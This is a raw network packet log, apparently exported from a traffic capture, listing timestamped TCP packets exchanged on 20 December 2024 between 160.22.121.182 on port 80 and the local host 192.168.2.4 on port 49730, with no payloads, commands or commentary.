                                                                                                              Dec 20, 2024 10:22:05.045488119 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:05.045571089 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:05.045622110 CET4973080192.168.2.4160.22.121.182
                                                                                                              Dec 20, 2024 10:22:05.048182964 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:05.048296928 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:05.048342943 CET4973080192.168.2.4160.22.121.182
                                                                                                              Dec 20, 2024 10:22:05.050901890 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:05.050945044 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:05.050992966 CET4973080192.168.2.4160.22.121.182
                                                                                                              Dec 20, 2024 10:22:05.053682089 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:05.053791046 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:05.053837061 CET4973080192.168.2.4160.22.121.182
                                                                                                              Dec 20, 2024 10:22:05.056195021 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:05.056287050 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:05.056330919 CET4973080192.168.2.4160.22.121.182
                                                                                                              Dec 20, 2024 10:22:05.058876038 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:05.059016943 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:05.059063911 CET4973080192.168.2.4160.22.121.182
                                                                                                              Dec 20, 2024 10:22:05.061557055 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:05.061671019 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:05.061718941 CET4973080192.168.2.4160.22.121.182
                                                                                                              Dec 20, 2024 10:22:05.064380884 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:05.064455986 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:05.064512968 CET4973080192.168.2.4160.22.121.182
                                                                                                              Dec 20, 2024 10:22:05.066988945 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:05.067074060 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:05.067182064 CET4973080192.168.2.4160.22.121.182
                                                                                                              Dec 20, 2024 10:22:05.211268902 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:05.211345911 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:05.211409092 CET4973080192.168.2.4160.22.121.182
                                                                                                              Dec 20, 2024 10:22:05.212263107 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:05.212342978 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:05.212385893 CET4973080192.168.2.4160.22.121.182
                                                                                                              Dec 20, 2024 10:22:05.214248896 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:05.214339018 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:05.214396954 CET4973080192.168.2.4160.22.121.182
                                                                                                              Dec 20, 2024 10:22:05.216279984 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:05.216454983 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:05.216553926 CET4973080192.168.2.4160.22.121.182
                                                                                                              Dec 20, 2024 10:22:05.218307972 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:05.218445063 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:05.218503952 CET4973080192.168.2.4160.22.121.182
                                                                                                              Dec 20, 2024 10:22:05.220808029 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:05.221005917 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:05.221163034 CET4973080192.168.2.4160.22.121.182
                                                                                                              Dec 20, 2024 10:22:05.223186970 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:05.223270893 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:05.223335981 CET4973080192.168.2.4160.22.121.182
                                                                                                              Dec 20, 2024 10:22:05.224976063 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:05.225100040 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:05.225152969 CET4973080192.168.2.4160.22.121.182
                                                                                                              Dec 20, 2024 10:22:05.226475954 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:05.226584911 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:05.226633072 CET4973080192.168.2.4160.22.121.182
                                                                                                              Dec 20, 2024 10:22:05.228544950 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:05.228629112 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:05.228682995 CET4973080192.168.2.4160.22.121.182
                                                                                                              Dec 20, 2024 10:22:05.230552912 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:05.230675936 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:05.230739117 CET4973080192.168.2.4160.22.121.182
                                                                                                              Dec 20, 2024 10:22:05.232614040 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:05.232773066 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:05.232826948 CET4973080192.168.2.4160.22.121.182
                                                                                                              Dec 20, 2024 10:22:05.234704018 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:05.234891891 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:05.234950066 CET4973080192.168.2.4160.22.121.182
                                                                                                              Dec 20, 2024 10:22:05.236834049 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:05.236984968 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:05.237035990 CET4973080192.168.2.4160.22.121.182
                                                                                                              Dec 20, 2024 10:22:05.238749027 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:05.238815069 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:05.238897085 CET4973080192.168.2.4160.22.121.182
                                                                                                              Dec 20, 2024 10:22:05.240807056 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:05.240843058 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:05.240905046 CET4973080192.168.2.4160.22.121.182
                                                                                                              Dec 20, 2024 10:22:05.242876053 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:05.243002892 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:05.243062973 CET4973080192.168.2.4160.22.121.182
                                                                                                              Dec 20, 2024 10:22:05.244889975 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:05.244973898 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:05.245018959 CET4973080192.168.2.4160.22.121.182
                                                                                                              Dec 20, 2024 10:22:05.246927023 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:05.247041941 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:05.247087955 CET4973080192.168.2.4160.22.121.182
                                                                                                              Dec 20, 2024 10:22:05.248975039 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:05.249068022 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:05.249186039 CET4973080192.168.2.4160.22.121.182
                                                                                                              Dec 20, 2024 10:22:05.251034975 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:05.251159906 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:05.251266956 CET4973080192.168.2.4160.22.121.182
                                                                                                              Dec 20, 2024 10:22:05.253065109 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:05.253185987 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:05.253242970 CET4973080192.168.2.4160.22.121.182
                                                                                                              Dec 20, 2024 10:22:05.255075932 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:05.255172014 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:05.255219936 CET4973080192.168.2.4160.22.121.182
                                                                                                              Dec 20, 2024 10:22:05.257124901 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:05.257219076 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:05.257258892 CET4973080192.168.2.4160.22.121.182
                                                                                                              Dec 20, 2024 10:22:05.259183884 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:05.259335041 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:05.259387970 CET4973080192.168.2.4160.22.121.182
                                                                                                              Dec 20, 2024 10:22:05.261229038 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:05.261327028 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:05.261373043 CET4973080192.168.2.4160.22.121.182
                                                                                                              Dec 20, 2024 10:22:05.263268948 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:05.263339996 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:05.263449907 CET4973080192.168.2.4160.22.121.182
                                                                                                              Dec 20, 2024 10:22:05.265321016 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:05.265420914 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:05.265474081 CET4973080192.168.2.4160.22.121.182
                                                                                                              Dec 20, 2024 10:22:05.267352104 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:05.267467976 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:05.267524004 CET4973080192.168.2.4160.22.121.182
                                                                                                              Dec 20, 2024 10:22:05.269375086 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:05.269432068 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:05.269489050 CET4973080192.168.2.4160.22.121.182
                                                                                                              Dec 20, 2024 10:22:05.271447897 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:05.271562099 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:05.271611929 CET4973080192.168.2.4160.22.121.182
                                                                                                              Dec 20, 2024 10:22:05.273469925 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:05.273544073 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:05.273591995 CET4973080192.168.2.4160.22.121.182
                                                                                                              Dec 20, 2024 10:22:05.275629044 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:05.275687933 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:05.275731087 CET4973080192.168.2.4160.22.121.182
                                                                                                              Dec 20, 2024 10:22:05.277585030 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:05.277744055 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:05.277791023 CET4973080192.168.2.4160.22.121.182
                                                                                                              Dec 20, 2024 10:22:05.279617071 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:05.279711962 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:05.279753923 CET4973080192.168.2.4160.22.121.182
                                                                                                              Dec 20, 2024 10:22:05.281627893 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:05.281754971 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:05.281796932 CET4973080192.168.2.4160.22.121.182
                                                                                                              Dec 20, 2024 10:22:05.283732891 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:05.283925056 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:05.283973932 CET4973080192.168.2.4160.22.121.182
                                                                                                              Dec 20, 2024 10:22:05.285767078 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:05.285878897 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:05.285929918 CET4973080192.168.2.4160.22.121.182
                                                                                                              Dec 20, 2024 10:22:05.287781954 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:05.287929058 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:05.287981987 CET4973080192.168.2.4160.22.121.182
                                                                                                              Dec 20, 2024 10:22:05.289854050 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:05.289992094 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:05.290045977 CET4973080192.168.2.4160.22.121.182
                                                                                                              Dec 20, 2024 10:22:05.291934013 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:05.291985035 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:05.292040110 CET4973080192.168.2.4160.22.121.182
                                                                                                              Dec 20, 2024 10:22:05.293956041 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:05.294049978 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:05.294101000 CET4973080192.168.2.4160.22.121.182
                                                                                                              Dec 20, 2024 10:22:05.296019077 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:05.296119928 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:05.296175957 CET4973080192.168.2.4160.22.121.182
                                                                                                              Dec 20, 2024 10:22:05.298006058 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:05.298108101 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:05.298161030 CET4973080192.168.2.4160.22.121.182
                                                                                                              Dec 20, 2024 10:22:05.300030947 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:05.300132990 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:05.300192118 CET4973080192.168.2.4160.22.121.182
                                                                                                              Dec 20, 2024 10:22:05.302083969 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:05.302180052 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:05.302227974 CET4973080192.168.2.4160.22.121.182
                                                                                                              Dec 20, 2024 10:22:05.304137945 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:05.304241896 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:05.304308891 CET4973080192.168.2.4160.22.121.182
                                                                                                              Dec 20, 2024 10:22:05.306160927 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:05.306361914 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:05.306420088 CET4973080192.168.2.4160.22.121.182
                                                                                                              Dec 20, 2024 10:22:05.308207035 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:05.308368921 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:05.308424950 CET4973080192.168.2.4160.22.121.182
                                                                                                              Dec 20, 2024 10:22:05.310245991 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:05.310381889 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:05.310435057 CET4973080192.168.2.4160.22.121.182
                                                                                                              Dec 20, 2024 10:22:05.312294006 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:05.312426090 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:05.312479973 CET4973080192.168.2.4160.22.121.182
                                                                                                              Dec 20, 2024 10:22:05.314407110 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:05.314543962 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:05.314603090 CET4973080192.168.2.4160.22.121.182
                                                                                                              Dec 20, 2024 10:22:05.316356897 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:05.316488981 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:05.316550016 CET4973080192.168.2.4160.22.121.182
                                                                                                              Dec 20, 2024 10:22:05.318414927 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:05.318515062 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:05.318573952 CET4973080192.168.2.4160.22.121.182
                                                                                                              Dec 20, 2024 10:22:05.320472002 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:05.320568085 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:05.320662975 CET4973080192.168.2.4160.22.121.182
                                                                                                              Dec 20, 2024 10:22:05.322559118 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:05.322638988 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:05.322700024 CET4973080192.168.2.4160.22.121.182
                                                                                                              Dec 20, 2024 10:22:05.408720970 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:05.408791065 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:05.408890009 CET4973080192.168.2.4160.22.121.182
                                                                                                              Dec 20, 2024 10:22:05.409487009 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:05.409606934 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:05.409651041 CET4973080192.168.2.4160.22.121.182
                                                                                                              Dec 20, 2024 10:22:05.411262989 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:05.411354065 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:05.411454916 CET4973080192.168.2.4160.22.121.182
                                                                                                              Dec 20, 2024 10:22:05.464114904 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:05.464207888 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:05.464266062 CET4973080192.168.2.4160.22.121.182
                                                                                                              Dec 20, 2024 10:22:05.464891911 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:05.464941978 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:05.465183973 CET4973080192.168.2.4160.22.121.182
                                                                                                              Dec 20, 2024 10:22:05.466300964 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:05.466424942 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:05.466702938 CET4973080192.168.2.4160.22.121.182
                                                                                                              Dec 20, 2024 10:22:05.467658043 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:05.467753887 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:05.467806101 CET4973080192.168.2.4160.22.121.182
                                                                                                              Dec 20, 2024 10:22:05.469160080 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:05.469249964 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:05.469425917 CET4973080192.168.2.4160.22.121.182
                                                                                                              Dec 20, 2024 10:22:05.470523119 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:05.470638990 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:05.470690012 CET4973080192.168.2.4160.22.121.182
                                                                                                              Dec 20, 2024 10:22:05.472040892 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:05.472172976 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:05.472913980 CET4973080192.168.2.4160.22.121.182
                                                                                                              Dec 20, 2024 10:22:05.473474979 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:05.473587036 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:05.474904060 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:05.474971056 CET4973080192.168.2.4160.22.121.182
                                                                                                              Dec 20, 2024 10:22:05.474978924 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:05.475023031 CET4973080192.168.2.4160.22.121.182
                                                                                                              Dec 20, 2024 10:22:05.476367950 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:05.476468086 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:05.476649046 CET4973080192.168.2.4160.22.121.182
                                                                                                              Dec 20, 2024 10:22:05.477750063 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:05.477854967 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:05.477927923 CET4973080192.168.2.4160.22.121.182
                                                                                                              Dec 20, 2024 10:22:05.479224920 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:05.479340076 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:05.479475021 CET4973080192.168.2.4160.22.121.182
                                                                                                              Dec 20, 2024 10:22:05.480626106 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:05.480751991 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:05.480802059 CET4973080192.168.2.4160.22.121.182
                                                                                                              Dec 20, 2024 10:22:05.482105017 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:05.482202053 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:05.482248068 CET4973080192.168.2.4160.22.121.182
                                                                                                              Dec 20, 2024 10:22:05.483522892 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:05.483633995 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:05.483678102 CET4973080192.168.2.4160.22.121.182
                                                                                                              Dec 20, 2024 10:22:05.484970093 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:05.485095024 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:05.485140085 CET4973080192.168.2.4160.22.121.182
                                                                                                              Dec 20, 2024 10:22:05.486423016 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:05.486510038 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:05.486556053 CET4973080192.168.2.4160.22.121.182
                                                                                                              Dec 20, 2024 10:22:05.487921000 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:05.488053083 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:05.488132000 CET4973080192.168.2.4160.22.121.182
                                                                                                              Dec 20, 2024 10:22:05.489316940 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:05.489414930 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:05.489459991 CET4973080192.168.2.4160.22.121.182
                                                                                                              Dec 20, 2024 10:22:05.490736961 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:05.490956068 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:05.491017103 CET4973080192.168.2.4160.22.121.182
                                                                                                              Dec 20, 2024 10:22:05.492183924 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:05.492307901 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:05.492352962 CET4973080192.168.2.4160.22.121.182
                                                                                                              Dec 20, 2024 10:22:05.493658066 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:05.493788958 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:05.493834019 CET4973080192.168.2.4160.22.121.182
                                                                                                              Dec 20, 2024 10:22:05.495111942 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:05.495286942 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:05.495356083 CET4973080192.168.2.4160.22.121.182
                                                                                                              Dec 20, 2024 10:22:05.496532917 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:05.496615887 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:05.496664047 CET4973080192.168.2.4160.22.121.182
                                                                                                              Dec 20, 2024 10:22:05.498001099 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:05.498121977 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:05.498174906 CET4973080192.168.2.4160.22.121.182
                                                                                                              Dec 20, 2024 10:22:05.499485970 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:05.499591112 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:05.499638081 CET4973080192.168.2.4160.22.121.182
                                                                                                              Dec 20, 2024 10:22:05.500884056 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:05.501096010 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:05.501152039 CET4973080192.168.2.4160.22.121.182
                                                                                                              Dec 20, 2024 10:22:05.502356052 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:05.502425909 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:05.502482891 CET4973080192.168.2.4160.22.121.182
                                                                                                              Dec 20, 2024 10:22:05.503755093 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:05.503878117 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:05.503969908 CET4973080192.168.2.4160.22.121.182
                                                                                                              Dec 20, 2024 10:22:05.505295992 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:05.505403042 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:05.505455017 CET4973080192.168.2.4160.22.121.182
                                                                                                              Dec 20, 2024 10:22:05.506722927 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:05.506812096 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:05.506859064 CET4973080192.168.2.4160.22.121.182
                                                                                                              Dec 20, 2024 10:22:05.508069992 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:05.508188963 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:05.508250952 CET4973080192.168.2.4160.22.121.182
                                                                                                              Dec 20, 2024 10:22:05.509546995 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:05.509628057 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:05.509677887 CET4973080192.168.2.4160.22.121.182
                                                                                                              Dec 20, 2024 10:22:05.510970116 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:05.511094093 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:05.511140108 CET4973080192.168.2.4160.22.121.182
                                                                                                              Dec 20, 2024 10:22:05.512470961 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:05.512618065 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:05.512660027 CET4973080192.168.2.4160.22.121.182
                                                                                                              Dec 20, 2024 10:22:05.513895035 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:05.513977051 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:05.514131069 CET4973080192.168.2.4160.22.121.182
                                                                                                              Dec 20, 2024 10:22:05.515316963 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:05.515439034 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:05.515485048 CET4973080192.168.2.4160.22.121.182
                                                                                                              Dec 20, 2024 10:22:05.516751051 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:05.516846895 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:05.516890049 CET4973080192.168.2.4160.22.121.182
                                                                                                              Dec 20, 2024 10:22:05.518201113 CET8049730160.22.121.182192.168.2.4
